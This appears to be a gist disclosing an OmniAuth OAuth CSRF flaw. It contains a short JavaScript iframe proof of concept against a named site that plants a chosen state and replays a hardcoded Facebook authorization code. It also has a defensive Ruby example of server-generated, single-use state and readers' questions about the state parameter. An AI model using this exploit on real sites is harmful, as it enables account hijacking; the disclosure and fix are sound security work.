omniauth vulnerability #2

We just put our state in user's session, then abort loading page to avoid deleting our value and then use OUR code with OUR state. CSRF again.
 
document.write('<iframe src="https://obaz.com/users/auth/facebook?state=123" name=im></iframe>');
setTimeout(function(){
im.stop()
document.write("<iframe src='https://obaz.com/users/auth/facebook/callback?state=123&code=AQCR436EWAPR7or-wB61HtzW1F2O1MvhdRregxe7f4dwkFZIIioePO1HtMTPK2HLPKmq85F1Fl9QhgOISHu6UDhaxNJeZ3fVm2K_Sr9VbJHbiwhFdGpLxPefKMY6fiuaS9DgMYSb-0huKcMsTd1bP13l9nWgKgHmIL2Qh6imIXV0PqRboAgJu4Txk0obe6RPerZSrbwsHHTteUwV2eg_L19o'></iframe>");
},300)
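The weakness the gist relies on is that the application accepts the `state` value from the request URL and stores it in the session, so a third party can choose it and then complete the callback with a known state. The defender-side fix, shown below as an added example in Ruby that is not OmniAuth's own code, is to have the server mint the state itself, ignore anything the client supplies, store it in the session, and consume it once on the callback before a constant-time comparison. The class name, the hash standing in for the Rack session, and the provider URL are assumptions for illustration.

```ruby
require 'securerandom'

# Minimal model of an OAuth request phase and callback phase with
# server-generated, single-use CSRF state. Added example, not OmniAuth code.
class OAuthStateGuard
  STATE_KEY = 'omniauth.state'
  CSRFError = Class.new(StandardError)

  # session: any Hash-like object; a plain Hash stands in for the Rack session here.
  def initialize(session)
    @session = session
  end

  # Request phase: any client-supplied state is ignored; a fresh random
  # value is stored in the session and sent to the provider.
  # Returns the redirect URL that would be issued (assumed provider host).
  def request_phase(_client_supplied_state = nil)
    state = SecureRandom.hex(24)
    @session[STATE_KEY] = state
    "https://provider.example/oauth/authorize?state=#{state}"
  end

  # Callback phase: the stored state is removed from the session before the
  # check, so it is single-use even when the comparison fails, then compared
  # in constant time against the value echoed back by the provider.
  def callback_phase(params)
    expected = @session.delete(STATE_KEY)
    provided = params['state'].to_s
    raise CSRFError, 'missing state' if expected.nil? || provided.empty?
    raise CSRFError, 'state mismatch' unless secure_compare(expected, provided)
    true
  end

  private

  # Constant-time byte comparison; length check first, then OR of XORs.
  def secure_compare(a, b)
    return false unless a.bytesize == b.bytesize
    a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
  end
end

if __FILE__ == $PROGRAM_NAME
  session = {}
  guard = OAuthStateGuard.new(session)
  puts guard.request_phase('123')   # the '123' is ignored; a random state is used
  begin
    guard.callback_phase('state' => '123')
  rescue OAuthStateGuard::CSRFError => e
    puts "rejected: #{e.message}"
  end
end
```

Because the state is consumed on the first callback regardless of outcome, the "abort the page load so the value is not deleted" trick in the gist has nothing to preserve: once a callback has been attempted, the session no longer holds a usable state.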

Is this saying that the presence of the state parameter creates an opportunity for CSRF? Can you explain the gist a little more?

Does the presence of the state parameter make any difference in this scenario?

My understanding is that the purpose of the state parameter itself is to help prevent CSRF (see: http://instagram.com/developer/authentication/), which states:

"Note: You may provide an optional state parameter to carry through any server-specific state you need to, for example, protect against CSRF issues."
